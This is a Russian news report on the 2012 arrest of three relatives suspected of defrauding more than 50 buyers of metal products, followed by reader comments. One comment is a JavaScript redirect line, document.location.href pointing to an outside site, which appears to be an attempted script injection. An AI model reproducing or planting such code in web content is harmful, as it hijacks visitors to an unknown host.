Мошенничество | 13 декабря 2012 г. | 14:32

Арестованы подозреваемые в мошенничестве г-не Сергеевы

Пресс-служба ГУ МВД России по г. Москве сообщила, что 6 декабря Тверской районный суд арестовал троих граждан, подозреваемых в мошенничестве на 80 млн. руб. Ранее в октябре 2012 г. следователем ГСУ ГУ МВД России по г. Москве было возбуждено уголовное дело по ч. 3 ст. 159 УК РФ (мошенничество в крупном размере). К нему было присоединено еще четыре ранее возбужденных дела по аналогичным преступлениям. В ходе расследования установлено, что на территории столицы действует организованная преступная группа, занимавшаяся хищением денежных средств граждан и организаций.

Заключив договор купли-продажи продукции из металла, клиенты перечисляли денежные средства на расчетные счета фиктивных организаций, открытых в различных банках г. Москвы. Получив деньги, злоумышленники не исполняли своих обязательств и не поставляли товар покупателям.

Как выяснилось, трое подозреваемых приходятся друг другу близкими родственниками. Неоднократно в правоохранительные органы на них поступали жалобы от граждан. Потерпевшие даже создали интернет-сайт, на котором подробно описали схему, по которой действовали аферисты.

В ходе проверочных мероприятий установлено, что они обманули более 50 потерпевших, а причиненный ими материальный ущерб составляет около 80 млн. рублей.

4 декабря Сергеевы были задержаны по подозрению в мошенничестве, им избрана мера пресечения — заключение по стражу. Оперативное сопровождение хода расследования осуществляет ОЭБиПК УВД по ЗАО ГУ МВД России по г. Москве.

Об этой группе лиц, подозреваемых в мошеннических действиях, шел разговор 6 декабря т.г. на совещании руководителей и начальников служб безопасности металлоторговых компаний, входящих в состав РСПМ. А 19 декабря состоится совещание Рабочей группы по координации действий служб безопасности компаний-членов РСПМ, в составе представителей РСПМ, компаний Трубмаш, ТФД Брок-Инвест-Сервис, Галактика, Ариэль Металл и Даймонд, с целью анализа сложившейся ситуации в работе правоохранительных органов по ведению дел о мошенничестве на рынке металлов и подготовки обращений в правоохранительные органы для привлечения внимания к этой проблеме.

Источник: ИИС «Металлоснабжение и сбыт»
Просмотров: 1228

Комментарии

  • http://moshennikisergeevy.ru/

    Вот они в полной красе!

  • document.location.href='http://hellbit.ru';

    • 0
    • document.location.href='http://hellbit.ru';
    • 14 декабря 2012 г.   00:38
    • ответить
  • Мошенников среди металлоторговцев очень много. Вот сайт regstal.ru, раньше у них сайт назывался stalsever.ru За полтора фирмы менялись раза 20 только некоторые название Регионстрой, Металлбизнесмаркет, Стройкомпани, Металлторг, Авалон сталь и т.д. Работаюи только по безналу. То они пишут на сайте якобы у них офис находится то в кунцево, то в Одинцово, то в Подольске и т.д. Дают минимальные цены клиены оплачивают, через несколько дней телефоны перестают отвечать, в основном фигурируются с телефона 924-00-89. Деньги обналичиваются, фирма пропадает, а клиент остается у разбитого корыта.

Все комментарии (3)


Комментарии могут оставлять только зарегистрированные (авторизованные) пользователи сайта.

Если вы нашли ошибку в тексте, вы можете уведомить об этом администрацию сайта, выбрав текст с ошибкой и нажатием кнопок Shift+Enter